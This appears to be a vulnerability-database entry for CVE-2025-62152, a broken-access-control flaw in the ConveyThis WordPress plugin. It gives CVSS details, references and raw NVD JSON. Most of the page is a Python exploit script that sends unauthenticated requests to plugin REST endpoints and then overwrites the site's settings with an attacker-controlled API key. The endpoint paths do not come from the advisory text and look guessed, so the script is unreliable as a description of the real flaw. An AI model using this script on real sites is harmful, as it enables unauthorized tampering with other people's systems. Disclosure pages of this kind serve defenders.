CVE-2025-62152

Description

Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ConveyThis: from n/a through <= 269.2.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ConveyThis translate插件 <= 269.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62152 PoC - ConveyThis Plugin Authorization Bypass
# Target: WordPress site with ConveyThis plugin <= 269.2

import requests
import json

target_url = "http://target-wordpress-site.com"

def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-62152"""
    
    # Try to access ConveyThis API endpoints without authentication
    api_endpoints = [
        "/wp-json/conveythis-translate/v1/settings",
        "/wp-json/conveythis-translate/v1/config",
        "/wp-json/conveythis-translate/v1/languages",
        "/?rest_route=/conveythis-translate/v1/get_settings"
    ]
    
    vulnerable = False
    leaked_data = []
    
    for endpoint in api_endpoints:
        try:
            # Send unauthenticated request
            response = requests.get(f"{target_url}{endpoint}", 
                                   timeout=10,
                                   headers={
                                       "User-Agent": "Mozilla/5.0",
                                       "Content-Type": "application/json"
                                   })
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if data:
                        vulnerable = True
                        leaked_data.append({
                            "endpoint": endpoint,
                            "status": response.status_code,
                            "data": data
                        })
                        print(f"[!] Vulnerable endpoint found: {endpoint}")
                        print(f"[+] Leaked data: {json.dumps(data, indent=2)}")
                except:
                    pass
            elif response.status_code == 401:
                print(f"[-] Endpoint requires auth: {endpoint}")
                
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    
    return vulnerable, leaked_data

def exploit_config_modification():
    """Attempt to modify ConveyThis configuration without auth"""
    
    # Malicious configuration payload
    payload = {
        "api_key": "attacker_controlled_key",
        "source_lang": "en",
        "target_langs": ["es", "fr", "de"],
        "auto_switch": True
    }
    
    exploit_url = f"{target_url}/wp-json/conveythis-translate/v1/settings"
    
    try:
        response = requests.post(exploit_url, 
                                json=payload,
                                headers={
                                    "User-Agent": "Mozilla/5.0",
                                    "Content-Type": "application/json"
                                })
        
        if response.status_code in [200, 201]:
            print(f"[!] Successfully modified ConveyThis settings!")
            print(f"[+] Response: {response.text}")
            return True
    except requests.RequestException as e:
        print(f"[-] Exploitation failed: {e}")
    
    return False

if __name__ == "__main__":
    print("CVE-2025-62152 ConveyThis Authorization Bypass PoC")
    print("=" * 50)
    
    is_vulnerable, data = check_vulnerability()
    
    if is_vulnerable:
        print("\n[!] TARGET IS VULNERABLE!")
        print("[*] Performing exploitation...")
        exploit_config_modification()
    else:
        print("\n[-] Target may not be vulnerable or plugin not installed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62152
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62152
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62152/
[4] VulDB https://vuldb.com/cve/CVE-2025-62152
[5] https://patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62152", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:01.587", "lastModified": "2026-04-27T18:16:26.197", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ConveyThis: from n/a through <= 269.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}